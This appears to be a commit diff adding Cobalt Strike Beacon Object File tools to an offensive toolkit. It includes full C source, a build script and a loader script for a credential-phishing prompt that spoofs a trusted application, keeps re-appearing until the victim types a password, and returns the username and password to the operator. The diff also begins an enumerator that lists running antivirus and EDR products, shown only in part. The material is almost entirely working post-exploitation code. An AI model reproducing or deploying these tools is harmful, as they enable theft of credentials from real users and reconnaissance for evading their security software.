New tools update

KIT/CredPrompt/README.md

@@ -0,0 +1,25 @@
+# AddTaskScheduler
+Start Windows credential prompt in an attempt to capture user credentials. Entered credentials are returned as output. The prompt is persistent so the victim can't cancel/close the prompt or enter an empty password. Any user attempt to do so is shown in the output. Finally, a timer is set on the prompt to make sure the beacon will return at some point.\n\n" .
+	
+>For the duration of the prompt, the beacon is occupied so set a reasonable timer. 
+
+## Arguments
+* `title`: a custom window title.
+* `message`: a custom message set in the window.
+* `timer`: number in seconds after how long the prompt should auto close. Default is set to 60.
+
+
+## Usage
+* `credprompt <title> <message> <(optional) time out>`
+
+
+## Examples
+* `credprompt "Microsoft Outlook" "Connecting to user@example.com" 30`
+
+
+## Compile
+- 1\. Make sure Visual Studio is installed and supports C/C++.
+- 2\. Open the `x64 Native Tools Command Prompt for VS <2019/2022>` terminal.
+- 3\. Run the `bofcompile.bat` script to compile the object file. 
+- 4\. In Cobalt strike, use the script manager to load the .cna script to import the tool. 
+

KIT/CredPrompt/beacon.h

@@ -0,0 +1,69 @@
+/*
+ * Beacon Object Files (BOF)
+ * -------------------------
+ * A Beacon Object File is a light-weight post exploitation tool that runs
+ * with Beacon's inline-execute command.
+ *
+ * Additional BOF resources are available here:
+ *   - https://github.com/Cobalt-Strike/bof_template
+ *
+ * Cobalt Strike 4.x
+ * ChangeLog:
+ *    1/25/2022: updated for 4.5
+ */
+
+/* data API */
+typedef struct {
+	char * original; /* the original buffer [so we can free it] */
+	char * buffer;   /* current pointer into our buffer */
+	int    length;   /* remaining length of data */
+	int    size;     /* total size of this buffer */
+} datap;
+
+DECLSPEC_IMPORT void    BeaconDataParse(datap * parser, char * buffer, int size);
+DECLSPEC_IMPORT char *  BeaconDataPtr(datap * parser, int size);
+DECLSPEC_IMPORT int     BeaconDataInt(datap * parser);
+DECLSPEC_IMPORT short   BeaconDataShort(datap * parser);
+DECLSPEC_IMPORT int     BeaconDataLength(datap * parser);
+DECLSPEC_IMPORT char *  BeaconDataExtract(datap * parser, int * size);
+
+/* format API */
+typedef struct {
+	char * original; /* the original buffer [so we can free it] */
+	char * buffer;   /* current pointer into our buffer */
+	int    length;   /* remaining length of data */
+	int    size;     /* total size of this buffer */
+} formatp;
+
+DECLSPEC_IMPORT void    BeaconFormatAlloc(formatp * format, int maxsz);
+DECLSPEC_IMPORT void    BeaconFormatReset(formatp * format);
+DECLSPEC_IMPORT void    BeaconFormatAppend(formatp * format, char * text, int len);
+DECLSPEC_IMPORT void    BeaconFormatPrintf(formatp * format, char * fmt, ...);
+DECLSPEC_IMPORT char *  BeaconFormatToString(formatp * format, int * size);
+DECLSPEC_IMPORT void    BeaconFormatFree(formatp * format);
+DECLSPEC_IMPORT void    BeaconFormatInt(formatp * format, int value);
+
+/* Output Functions */
+#define CALLBACK_OUTPUT      0x0
+#define CALLBACK_OUTPUT_OEM  0x1e
+#define CALLBACK_OUTPUT_UTF8 0x20
+#define CALLBACK_ERROR       0x0d
+
+DECLSPEC_IMPORT void   BeaconOutput(int type, char * data, int len);
+DECLSPEC_IMPORT void   BeaconPrintf(int type, char * fmt, ...);
+
+
+/* Token Functions */
+DECLSPEC_IMPORT BOOL   BeaconUseToken(HANDLE token);
+DECLSPEC_IMPORT void   BeaconRevertToken();
+DECLSPEC_IMPORT BOOL   BeaconIsAdmin();
+
+/* Spawn+Inject Functions */
+DECLSPEC_IMPORT void   BeaconGetSpawnTo(BOOL x86, char * buffer, int length);
+DECLSPEC_IMPORT void   BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len);
+DECLSPEC_IMPORT void   BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len);
+DECLSPEC_IMPORT BOOL   BeaconSpawnTemporaryProcess(BOOL x86, BOOL ignoreToken, STARTUPINFO * si, PROCESS_INFORMATION * pInfo);
+DECLSPEC_IMPORT void   BeaconCleanupProcess(PROCESS_INFORMATION * pInfo);
+
+/* Utility Functions */
+DECLSPEC_IMPORT BOOL   toWideChar(char * src, wchar_t * dst, int max);

KIT/CredPrompt/bofcompile.bat

@@ -0,0 +1,6 @@
+@ECHO OFF
+
+cl.exe /nologo /c /Od /MT /W0 /GS- /Tc credprompt.c
+move /y credprompt.obj credprompt.o
+
+

KIT/CredPrompt/credprompt.c

@@ -0,0 +1,284 @@
+#define SECURITY_WIN32
+
+#include <stdio.h>
+#include <windows.h>
+#include <wincred.h>
+#include <Lmcons.h>
+#include <security.h>
+#include "credprompt.h"
+#include "beacon.h"
+
+#pragma comment(lib, "Secur32.lib")
+#pragma comment(lib, "credui.lib")
+#pragma comment(lib, "ole32.lib")
+#pragma comment(lib, "user32.lib")
+
+typedef struct {
+    UINT timeout;
+    HANDLE hTimeoutEvent;
+} TIMEOUT_STRUCT;
+
+
+
+
+//https://github.com/outflanknl/C2-Tool-Collection/blob/main/BOF/Psx/SOURCE/Psx.c
+HRESULT BeaconPrintToStreamW(_In_z_ LPCWSTR lpwFormat, ...) {
+	HRESULT hr = S_FALSE;
+	va_list argList;
+	DWORD dwWritten = 0;
+
+	if (g_lpStream <= (LPSTREAM)1) {
+		hr = OLE32$CreateStreamOnHGlobal(NULL, TRUE, &g_lpStream);
+		if (FAILED(hr)) {
+			return hr;
+		}
+	}
+
+	if (g_lpwPrintBuffer <= (LPWSTR)1) { 
+		g_lpwPrintBuffer = (LPWSTR)MSVCRT$calloc(MAX_STRING, sizeof(WCHAR));
+		if (g_lpwPrintBuffer == NULL) {
+			hr = E_FAIL;
+			goto CleanUp;
+		}
+	}
+
+	va_start(argList, lpwFormat);
+	if (!MSVCRT$_vsnwprintf_s(g_lpwPrintBuffer, MAX_STRING, MAX_STRING -1, lpwFormat, argList)) {
+		hr = E_FAIL;
+		goto CleanUp;
+	}
+
+	if (g_lpStream != NULL) {
+		if (FAILED(hr = g_lpStream->lpVtbl->Write(g_lpStream, g_lpwPrintBuffer, (ULONG)MSVCRT$wcslen(g_lpwPrintBuffer) * sizeof(WCHAR), &dwWritten))) {
+			goto CleanUp;
+		}
+	}
+
+	hr = S_OK;
+
+CleanUp:
+
+	if (g_lpwPrintBuffer != NULL) {
+		MSVCRT$memset(g_lpwPrintBuffer, 0, MAX_STRING * sizeof(WCHAR)); 
+	}
+
+	va_end(argList);
+	return hr;
+}
+
+//https://github.com/outflanknl/C2-Tool-Collection/blob/main/BOF/Psx/SOURCE/Psx.c
+VOID BeaconOutputStreamW() {
+	STATSTG ssStreamData = { 0 };
+	SIZE_T cbSize = 0;
+	ULONG cbRead = 0;
+	LARGE_INTEGER pos;
+	LPWSTR lpwOutput = NULL;
+
+	if (FAILED(g_lpStream->lpVtbl->Stat(g_lpStream, &ssStreamData, STATFLAG_NONAME))) {
+		return;
+	}
+
+	cbSize = ssStreamData.cbSize.LowPart;
+	lpwOutput = KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, cbSize + 1);
+	if (lpwOutput != NULL) {
+		pos.QuadPart = 0;
+		if (FAILED(g_lpStream->lpVtbl->Seek(g_lpStream, pos, STREAM_SEEK_SET, NULL))) {
+			goto CleanUp;
+		}
+
+		if (FAILED(g_lpStream->lpVtbl->Read(g_lpStream, lpwOutput, (ULONG)cbSize, &cbRead))) {		
+			goto CleanUp;
+		}
+
+		BeaconPrintf(CALLBACK_OUTPUT, "%ls", lpwOutput);
+	}
+
+CleanUp:
+	if (g_lpStream != NULL) {
+		g_lpStream->lpVtbl->Release(g_lpStream);
+		g_lpStream = NULL;
+	}
+
+	if (g_lpwPrintBuffer != NULL) {
+		MSVCRT$free(g_lpwPrintBuffer); 
+		g_lpwPrintBuffer = NULL;
+	}
+
+	if (lpwOutput != NULL) {
+		KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, lpwOutput);
+	}
+	return;
+}
+
+
+BOOL is_empty_or_whitespace(WCHAR *str) {
+    if (str == NULL) {
+        return TRUE;
+    }
+
+    while (*str) {
+        if (!MSVCRT$iswspace(*str)) {
+            return FALSE;
+        }
+        str++;
+    }
+    return TRUE;
+}
+
+
+BOOL CALLBACK EnumWindowsProc(HWND hWnd, LPARAM lParam) {
+    WCHAR className[256] = {0};
+    USER32$GetClassNameW(hWnd, className, sizeof(className) / sizeof(WCHAR));
+
+    if (MSVCRT$wcscmp(className, L"Credential Dialog Xaml Host") == 0) {
+        USER32$PostMessageW(hWnd, WM_CLOSE, 0, 0);
+        return FALSE;
+    }
+
+    return TRUE;
+}
+
+
+DWORD WINAPI PromptWithTimeout(LPVOID lParam) {
+    TIMEOUT_STRUCT *pTimeoutStruct = (TIMEOUT_STRUCT *)lParam;
+    UINT timeout = pTimeoutStruct->timeout;
+    HANDLE hTimeoutEvent = pTimeoutStruct->hTimeoutEvent;
+
+    KERNEL32$Sleep(timeout * 1000);
+    USER32$EnumWindows(EnumWindowsProc, 0);
+    KERNEL32$SetEvent(hTimeoutEvent);
+
+    return 0;
+}
+
+
+BOOL PromptForCreds(LPWSTR title, LPWSTR message, LPWSTR *username, LPWSTR *password, LPWSTR *domain, UINT timeout)
+{
+    PVOID packed_credentials = NULL;
+    ULONG packed_credentials_size = 0;
+	
+	HANDLE hTimeoutEvent = KERNEL32$CreateEventW(NULL, TRUE, FALSE, NULL);
+
+    // Get current username in DOMAIN\USERNAME format
+    WCHAR domainUsername[DNLEN + UNLEN + 2];
+    ULONG nSize = sizeof(domainUsername) / sizeof(WCHAR);
+    if (SECUR32$GetUserNameExW(NameSamCompatible, domainUsername, &nSize)) {
+        // Pack current username
+        WCHAR prefilled_username[DNLEN + UNLEN + 2];
+        MSVCRT$_snwprintf(prefilled_username, (sizeof(prefilled_username) / sizeof(WCHAR)) - 1, L"%s", domainUsername);
+
+        CREDUI$CredPackAuthenticationBufferW(0, prefilled_username, L"", NULL, &packed_credentials_size);
+        packed_credentials = MSVCRT$malloc(packed_credentials_size);
+        CREDUI$CredPackAuthenticationBufferW(0, prefilled_username, L"", (PBYTE)packed_credentials, &packed_credentials_size);
+    }
+	
+    BOOL bValidPassword = FALSE;
+    DWORD result;
+	
+	TIMEOUT_STRUCT timeoutStruct;
+	timeoutStruct.timeout = timeout;
+	timeoutStruct.hTimeoutEvent = hTimeoutEvent;
+
+	DWORD threadId;
+	HANDLE hThread = KERNEL32$CreateThread(NULL, 0, PromptWithTimeout, (LPVOID)&timeoutStruct, 0, &threadId);
+	
+	BeaconPrintToStreamW(L"\nPrompt event log:\n");
+	BeaconPrintToStreamW(L"==============================================\n");
+	
+    do {
+        // Prompt for credentials
+        CREDUI_INFOW credui_info = {0};
+        credui_info.cbSize = sizeof(credui_info);
+        credui_info.pszCaptionText = title;
+        credui_info.pszMessageText = message;
+		credui_info.hwndParent = NULL;
+		
+		HWND hWnd = USER32$GetForegroundWindow();
+		if (hWnd != NULL) {
+			credui_info.hwndParent = hWnd;
+		}
+
+        DWORD auth_package = 0;
+        BOOL save_credentials = FALSE;
+        ULONG out_credentials_size = 0;
+        LPVOID out_credentials = NULL;
+
+        result = CREDUI$CredUIPromptForWindowsCredentialsW(&credui_info, 0, &auth_package, packed_credentials, packed_credentials_size, &out_credentials, &out_credentials_size, &save_credentials, CREDUIWIN_GENERIC | CREDUIWIN_CHECKBOX);
+
+        if (result == NO_ERROR)
+        {
+            *username = (LPWSTR)MSVCRT$malloc(CREDUI_MAX_USERNAME_LENGTH * sizeof(WCHAR));
+            *password = (LPWSTR)MSVCRT$malloc(CREDUI_MAX_USERNAME_LENGTH * sizeof(WCHAR));
+            *domain = (LPWSTR)MSVCRT$malloc(CREDUI_MAX_USERNAME_LENGTH * sizeof(WCHAR));
+
+            ULONG max_username = CREDUI_MAX_USERNAME_LENGTH;
+            ULONG max_password = CREDUI_MAX_USERNAME_LENGTH;
+            ULONG max_domain = CREDUI_MAX_USERNAME_LENGTH;
+            CREDUI$CredUnPackAuthenticationBufferW(0, out_credentials, out_credentials_size, *username, &max_username, *domain, &max_domain, *password, &max_password);
+	
+            bValidPassword = !is_empty_or_whitespace(*password);
+            if (!bValidPassword) {
+                BeaconPrintToStreamW(L"[!] User tried to enter empty password\n");
+            }
+            MSVCRT$memset(out_credentials, 0, out_credentials_size);
+            OLE32$CoTaskMemFree(out_credentials);
+		}
+		
+		else {
+			if (KERNEL32$WaitForSingleObject(hTimeoutEvent, 0) == WAIT_OBJECT_0) {
+				BeaconPrintToStreamW(L"[!] Credential prompt timed out\n");
+				break;
+				
+			} else {
+				BeaconPrintToStreamW(L"[!] User tried to close the prompt\n");
+			}
+		}
+	} while (!bValidPassword);
+	
+	KERNEL32$TerminateThread(hThread, 0);
+	KERNEL32$CloseHandle(hThread);
+	
+	if (packed_credentials)
+	{
+	MSVCRT$memset(packed_credentials, 0, packed_credentials_size);
+		MSVCRT$free(packed_credentials);
+	}
+
+	return bValidPassword;
+}
+
+
+int go(char *args, int len) {
+	LPWSTR title = L"";
+	LPWSTR message = L"";
+    LPWSTR username = NULL;
+    LPWSTR password = NULL;
+	LPWSTR domain = NULL;
+    UINT timer_seconds = 60;
+	datap parser;
+	
+	BeaconDataParse(&parser, args, len);
+	title = BeaconDataExtract(&parser, NULL);
+	message = BeaconDataExtract(&parser, NULL);
+	timer_seconds = BeaconDataInt(&parser, NULL);
+	
+	
+    if (PromptForCreds(title, message, &username, &password, &domain, timer_seconds))
+	{
+        BeaconPrintToStreamW(L"[+] User entered something:\n\tUsername: %ls\n\tPassword: %ls\n", username, password);
+		BeaconOutputStreamW();
+		
+		MSVCRT$memset(password, 0, MSVCRT$wcslen(password) * sizeof(WCHAR));
+        MSVCRT$free(username);
+        MSVCRT$free(password);
+        MSVCRT$free(domain);
+    }
+    else
+    {
+		BeaconOutputStreamW();
+        BeaconPrintf(CALLBACK_ERROR, "No credentials were obtained.\n");
+    }
+
+    return 0;
+}
+

KIT/CredPrompt/credprompt.cna

@@ -0,0 +1,36 @@
+# author REDMED-X
+
+beacon_command_register(
+	"credprompt", "Start custom Windows credential prompt.",
+	"INFO:\nStart Windows credential prompt in an attempt to capture user credentials. Entered credentials are returned as output. The prompt is persistent so the victim can't cancel/close the prompt or enter an empty password. Any user attempt to do so is shown in the output. Finally, a timer for the prompt is set to make sure the beacon will return at some point.\n\n" .
+	"ARGUMENTS:\n[<title>]: a custom window title.\n[<message>]: a custom message set in the window.\n[<timer>]: number in seconds after how long the prompt should auto close. Default is set to 60.\n\n" .
+	"USAGE:\ncredprompt <title> <message> <(optional) timer>\n\n" .
+	"EXAMPLES:\ncredprompt \"Microsoft Outlook\" \"Connecting to user@example.com\" 60\n\n");
+	
+alias credprompt {
+    $bid = $1;
+	$title = $2;
+    $message = $3;
+	$timer = $4;
+	
+	if ($title eq "") {
+		berror($bid, "Please give the window a custom title.\n");
+		return;
+	}
+
+	if ($message eq "") {
+		berror($bid, "Please give the window a custom message.\n");
+		return;
+	}
+	
+    # Read in the right BOF file
+    $handle = openf(script_resource("credprompt.o"));
+    $data = readb($handle, -1);
+    closef($handle);
+
+	# Pack our arguments
+    $arg_data = bof_pack($bid, "ZZi", $title, $message, $timer);
+
+	blog($bid, "Tasked to start a credential prompt..");
+    beacon_inline_execute($bid, $data, "go", $arg_data);
+}

KIT/CredPrompt/credprompt.h

@@ -0,0 +1,52 @@
+#include <windows.h>  
+
+//is_empty_or_whitespace
+DECLSPEC_IMPORT int __cdecl MSVCRT$iswspace(wint_t _C);
+
+//EnumWindowsProc
+DECLSPEC_IMPORT int __cdecl MSVCRT$wcscmp(const wchar_t* _Str1, const wchar_t* _Str2);
+DECLSPEC_IMPORT int WINAPI USER32$GetClassNameW(HWND hWnd, LPWSTR lpClassName, int nMaxCount);
+DECLSPEC_IMPORT BOOL WINAPI USER32$PostMessageW(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam);
+
+//PromptWithTimeout
+DECLSPEC_IMPORT VOID WINAPI KERNEL32$Sleep (DWORD dwMilliseconds);
+DECLSPEC_IMPORT BOOL WINAPI USER32$EnumWindows(WNDENUMPROC lpEnumFunc, LPARAM lParam);
+
+//PromptForCreds
+DECLSPEC_IMPORT int __cdecl MSVCRT$_snwprintf(wchar_t* _Dst, size_t _MaxCount, const wchar_t* _Format, ...);
+DECLSPEC_IMPORT BOOL WINAPI SECUR32$GetUserNameExW(EXTENDED_NAME_FORMAT NameFormat, LPWSTR lpNameBuffer, PULONG nSize);
+DECLSPEC_IMPORT DWORD WINAPI CREDUI$CredUIPromptForWindowsCredentialsW(PCREDUI_INFOW pUiInfo, DWORD dwAuthError, ULONG *pulAuthPackage, LPCVOID pvInAuthBuffer, ULONG ulInAuthBufferSize, LPVOID *ppvOutAuthBuffer, ULONG *pulOutAuthBufferSize, BOOL *pfSave, DWORD dwFlags);
+DECLSPEC_IMPORT BOOL WINAPI CREDUI$CredUnPackAuthenticationBufferW(DWORD dwFlags, PVOID pAuthBuffer, DWORD cbAuthBuffer, LPWSTR pszUserName, DWORD *pcchMaxUserName, LPWSTR pszDomainName, DWORD *pcchMaxDomainName, LPWSTR pszPassword, DWORD *pcchMaxPassword);
+DECLSPEC_IMPORT BOOL WINAPI CREDUI$CredPackAuthenticationBufferW(DWORD dwFlags, LPWSTR pszUserName, LPWSTR pszPassword, PBYTE pPackedCredentials, DWORD *pcbPackedCredentials);
+DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$CreateThread(LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId);
+DECLSPEC_IMPORT BOOL WINAPI KERNEL32$SetEvent(HANDLE hEvent);
+DECLSPEC_IMPORT DWORD WINAPI KERNEL32$WaitForSingleObject(HANDLE hHandle, DWORD dwMilliseconds);
+DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$CreateEventW(LPSECURITY_ATTRIBUTES lpEventAttributes, BOOL bManualReset, BOOL bInitialState, LPCWSTR lpName);
+//DECLSPEC_IMPORT void* __cdecl MSVCRT$memset(void* _Dst, int _Val, size_t _Size);
+DECLSPEC_IMPORT void WINAPI OLE32$CoTaskMemFree(LPVOID pv);
+DECLSPEC_IMPORT BOOL WINAPI KERNEL32$TerminateThread(HANDLE hThread, DWORD dwExitCode);
+DECLSPEC_IMPORT BOOL WINAPI KERNEL32$CloseHandle(HANDLE hObject);
+DECLSPEC_IMPORT void __cdecl MSVCRT$free(void* _Block);
+DECLSPEC_IMPORT size_t __cdecl MSVCRT$wcslen(const wchar_t* _Str);
+DECLSPEC_IMPORT void* __cdecl MSVCRT$malloc(size_t _Size);
+DECLSPEC_IMPORT HWND USER32$GetForegroundWindow();
+
+//BeaconPrintToStreamW + BeaconOutputStreamW
+#define MAX_STRING 8192
+INT g_iGarbage = 1;
+LPSTREAM g_lpStream = (LPSTREAM)1;
+LPWSTR g_lpwPrintBuffer = (LPWSTR)1;
+DECLSPEC_IMPORT HRESULT WINAPI OLE32$CreateStreamOnHGlobal(HGLOBAL hGlobal, BOOL fDeleteOnRelease, LPSTREAM *ppstm);
+WINBASEAPI void *__cdecl MSVCRT$calloc(size_t number, size_t size);
+WINBASEAPI int __cdecl MSVCRT$_vsnwprintf_s(wchar_t *buffer, size_t sizeOfBuffer, size_t count, const wchar_t *format, va_list argptr);
+WINBASEAPI size_t __cdecl MSVCRT$wcslen(const wchar_t *_Str);
+WINBASEAPI void __cdecl MSVCRT$memset(void *dest, int c, size_t count);
+WINBASEAPI HANDLE WINAPI KERNEL32$GetProcessHeap();
+WINBASEAPI LPVOID WINAPI KERNEL32$HeapAlloc(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes);
+WINBASEAPI void __cdecl MSVCRT$free(void *memblock);
+WINBASEAPI BOOL WINAPI KERNEL32$HeapFree(HANDLE, DWORD, PVOID);
+DECLSPEC_IMPORT int WINAPI KERNEL32$MultiByteToWideChar(UINT CodePage, DWORD dwFlags, _In_NLS_string_(cbMultiByte)LPCCH lpMultiByteStr, int cbMultiByte, LPWSTR lpWideCharStr, int cchWideChar);
+
+
+
+

KIT/EnumSecProducts/README.md

@@ -0,0 +1,15 @@
+# EnumSecProducts
+Get a list of security products (like AV/EDR) that are running on the system. This is done by comparing running processes against a hardcoded list of 130 security products.
+
+
+## Usage
+* `enumsecproducts`
+
+
+## Compile
+- 1\. Make sure Visual Studio is installed and supports C/C++.
+- 2\. Open the `x64 Native Tools Command Prompt for VS <2019/2022>` terminal.
+- 3\. Run the `bofcompile.bat` script to compile the object file. 
+- 4\. In Cobalt strike, use the script manager to load the .cna script to import the tool. 
+
+

KIT/EnumSecProducts/beacon.h

@@ -0,0 +1,69 @@
+/*
+ * Beacon Object Files (BOF)
+ * -------------------------
+ * A Beacon Object File is a light-weight post exploitation tool that runs
+ * with Beacon's inline-execute command.
+ *
+ * Additional BOF resources are available here:
+ *   - https://github.com/Cobalt-Strike/bof_template
+ *
+ * Cobalt Strike 4.x
+ * ChangeLog:
+ *    1/25/2022: updated for 4.5
+ */
+
+/* data API */
+typedef struct {
+	char * original; /* the original buffer [so we can free it] */
+	char * buffer;   /* current pointer into our buffer */
+	int    length;   /* remaining length of data */
+	int    size;     /* total size of this buffer */
+} datap;
+
+DECLSPEC_IMPORT void    BeaconDataParse(datap * parser, char * buffer, int size);
+DECLSPEC_IMPORT char *  BeaconDataPtr(datap * parser, int size);
+DECLSPEC_IMPORT int     BeaconDataInt(datap * parser);
+DECLSPEC_IMPORT short   BeaconDataShort(datap * parser);
+DECLSPEC_IMPORT int     BeaconDataLength(datap * parser);
+DECLSPEC_IMPORT char *  BeaconDataExtract(datap * parser, int * size);
+
+/* format API */
+typedef struct {
+	char * original; /* the original buffer [so we can free it] */
+	char * buffer;   /* current pointer into our buffer */
+	int    length;   /* remaining length of data */
+	int    size;     /* total size of this buffer */
+} formatp;
+
+DECLSPEC_IMPORT void    BeaconFormatAlloc(formatp * format, int maxsz);
+DECLSPEC_IMPORT void    BeaconFormatReset(formatp * format);
+DECLSPEC_IMPORT void    BeaconFormatAppend(formatp * format, char * text, int len);
+DECLSPEC_IMPORT void    BeaconFormatPrintf(formatp * format, char * fmt, ...);
+DECLSPEC_IMPORT char *  BeaconFormatToString(formatp * format, int * size);
+DECLSPEC_IMPORT void    BeaconFormatFree(formatp * format);
+DECLSPEC_IMPORT void    BeaconFormatInt(formatp * format, int value);
+
+/* Output Functions */
+#define CALLBACK_OUTPUT      0x0
+#define CALLBACK_OUTPUT_OEM  0x1e
+#define CALLBACK_OUTPUT_UTF8 0x20
+#define CALLBACK_ERROR       0x0d
+
+DECLSPEC_IMPORT void   BeaconOutput(int type, char * data, int len);
+DECLSPEC_IMPORT void   BeaconPrintf(int type, char * fmt, ...);
+
+
+/* Token Functions */
+DECLSPEC_IMPORT BOOL   BeaconUseToken(HANDLE token);
+DECLSPEC_IMPORT void   BeaconRevertToken();
+DECLSPEC_IMPORT BOOL   BeaconIsAdmin();
+
+/* Spawn+Inject Functions */
+DECLSPEC_IMPORT void   BeaconGetSpawnTo(BOOL x86, char * buffer, int length);
+DECLSPEC_IMPORT void   BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len);
+DECLSPEC_IMPORT void   BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len);
+DECLSPEC_IMPORT BOOL   BeaconSpawnTemporaryProcess(BOOL x86, BOOL ignoreToken, STARTUPINFO * si, PROCESS_INFORMATION * pInfo);
+DECLSPEC_IMPORT void   BeaconCleanupProcess(PROCESS_INFORMATION * pInfo);
+
+/* Utility Functions */
+DECLSPEC_IMPORT BOOL   toWideChar(char * src, wchar_t * dst, int max);

KIT/EnumSecProducts/bofcompile.bat

@@ -0,0 +1,6 @@
+@ECHO OFF
+
+cl.exe /nologo /c /Od /MT /W0 /GS- /Tc enumsecproducts.c
+move /y enumsecproducts.obj enumsecproducts.o
+
+

KIT/EnumSecProducts/enumsecproducts.c

@@ -0,0 +1,692 @@
+#include <stdio.h>
+#include <stdbool.h>
+#include <string.h>
+#include <ctype.h>
+#include <windows.h>
+#include <tlhelp32.h>
+#include "enumsecproducts.h"
+#include "beacon.h"
+
+
+typedef struct {
+    const char *filename;
+    const char *description;
+    const char *category;
+} SoftwareData;
+
+
+
+//https://github.com/outflanknl/C2-Tool-Collection/blob/main/BOF/Psx/SOURCE/Psx.c
+HRESULT BeaconPrintToStreamW(_In_z_ LPCWSTR lpwFormat, ...) {
+	HRESULT hr = S_FALSE;
+	va_list argList;
+	DWORD dwWritten = 0;
+
+	if (g_lpStream <= (LPSTREAM)1) {
+		hr = OLE32$CreateStreamOnHGlobal(NULL, TRUE, &g_lpStream);
+		if (FAILED(hr)) {
+			return hr;
+		}
+	}
+
+	if (g_lpwPrintBuffer <= (LPWSTR)1) { 
+		g_lpwPrintBuffer = (LPWSTR)MSVCRT$calloc(MAX_STRING, sizeof(WCHAR));
+		if (g_lpwPrintBuffer == NULL) {
+			hr = E_FAIL;
+			goto CleanUp;
+		}
+	}
+
+	va_start(argList, lpwFormat);
+	if (!MSVCRT$_vsnwprintf_s(g_lpwPrintBuffer, MAX_STRING, MAX_STRING -1, lpwFormat, argList)) {
+		hr = E_FAIL;
+		goto CleanUp;
+	}
+
+	if (g_lpStream != NULL) {
+		if (FAILED(hr = g_lpStream->lpVtbl->Write(g_lpStream, g_lpwPrintBuffer, (ULONG)MSVCRT$wcslen(g_lpwPrintBuffer) * sizeof(WCHAR), &dwWritten))) {
+			goto CleanUp;
+		}
+	}
+
+	hr = S_OK;
+
+CleanUp:
+
+	if (g_lpwPrintBuffer != NULL) {
+		MSVCRT$memset(g_lpwPrintBuffer, 0, MAX_STRING * sizeof(WCHAR)); 
+	}
+
+	va_end(argList);
+	return hr;
+}
+
+//https://github.com/outflanknl/C2-Tool-Collection/blob/main/BOF/Psx/SOURCE/Psx.c
+VOID BeaconOutputStreamW() {
+	STATSTG ssStreamData = { 0 };
+	SIZE_T cbSize = 0;
+	ULONG cbRead = 0;
+	LARGE_INTEGER pos;
+	LPWSTR lpwOutput = NULL;
+
+	if (FAILED(g_lpStream->lpVtbl->Stat(g_lpStream, &ssStreamData, STATFLAG_NONAME))) {
+		return;
+	}
+
+	cbSize = ssStreamData.cbSize.LowPart;
+	lpwOutput = KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, cbSize + 1);
+	if (lpwOutput != NULL) {
+		pos.QuadPart = 0;
+		if (FAILED(g_lpStream->lpVtbl->Seek(g_lpStream, pos, STREAM_SEEK_SET, NULL))) {
+			goto CleanUp;
+		}
+
+		if (FAILED(g_lpStream->lpVtbl->Read(g_lpStream, lpwOutput, (ULONG)cbSize, &cbRead))) {		
+			goto CleanUp;
+		}
+
+		BeaconPrintf(CALLBACK_OUTPUT, "%ls", lpwOutput);
+	}
+
+CleanUp:
+	if (g_lpStream != NULL) {
+		g_lpStream->lpVtbl->Release(g_lpStream);
+		g_lpStream = NULL;
+	}
+
+	if (g_lpwPrintBuffer != NULL) {
+		MSVCRT$free(g_lpwPrintBuffer); 
+		g_lpwPrintBuffer = NULL;
+	}
+
+	if (lpwOutput != NULL) {
+		KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, lpwOutput);
+	}
+	return;
+}
+
+
+
+bool CheckSecProc() {
+    bool foundSecProduct = false;
+    HANDLE procHandle;
+    PROCESSENTRY32 pe32;
+	
+	//allocate memory for list
+	size_t numSoftware = 130; //130
+    SoftwareData *softwareList = (SoftwareData *)KERNEL32$VirtualAlloc(NULL, numSoftware * sizeof(SoftwareData), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+
+    if (softwareList == NULL) {
+        return 1;
+    }
+
+    //Start security product list
+	softwareList[0].filename = "avastsvc.exe";
+	softwareList[0].description = L"Avast";
+	softwareList[0].category = L"AV";
+
+	softwareList[1].filename = "avastui.exe";
+	softwareList[1].description = L"Avast";
+	softwareList[1].category = L"AV";
+
+	softwareList[2].filename = "avgnt.exe";
+	softwareList[2].description = L"Avira";
+	softwareList[2].category = L"AV";
+
+	softwareList[3].filename = "avguard.exe";
+	softwareList[3].description = L"Avira";
+	softwareList[3].category = L"AV";
+
+	softwareList[4].filename = "avp.exe";
+	softwareList[4].description = L"Kaspersky";
+	softwareList[4].category = L"AV";
+
+	softwareList[5].filename = "axcrypt.exe";
+	softwareList[5].description = L"AxCrypt";
+	softwareList[5].category = L"Encryption";
+
+	softwareList[6].filename = "bdagent.exe";
+	softwareList[6].description = L"Bitdefender Total Security";
+	softwareList[6].category = L"AV";
+
+	softwareList[7].filename = "carbonsensor.exe";
+	softwareList[7].description = L"VMware Carbon Black EDR";
+	softwareList[7].category = L"EDR";
+
+	softwareList[8].filename = "cbcomms.exe";
+	softwareList[8].description = L"CrowdStrike Falcon Insight XDR";
+	softwareList[8].category = L"XDR";
+
+	softwareList[9].filename = "ccsvchst.exe";
+	softwareList[9].description = L"Symantec Endpoint Protection";
+	softwareList[9].category = L"AV";
+
+	softwareList[10].filename = "cpd.exe";
+	softwareList[10].description = L"Check Point Daemon";
+	softwareList[10].category = L"Security";
+
+	softwareList[11].filename = "cpx.exe";
+	softwareList[11].description = L"SentinelOne Singularity XDR";
+	softwareList[11].category = L"XDR";
+
+	softwareList[12].filename = "csfalconservice.exe";
+	softwareList[12].description = L"CrowdStrike Falcon Insight XDR";
+	softwareList[12].category = L"XDR";
+
+	softwareList[13].filename = "cybereason.exe";
+	softwareList[13].description = L"Cybereason EDR";
+	softwareList[13].category = L"EDR";
+
+	softwareList[14].filename = "cytomicendpoint.exe";
+	softwareList[14].description = L"Cytomic Orion";
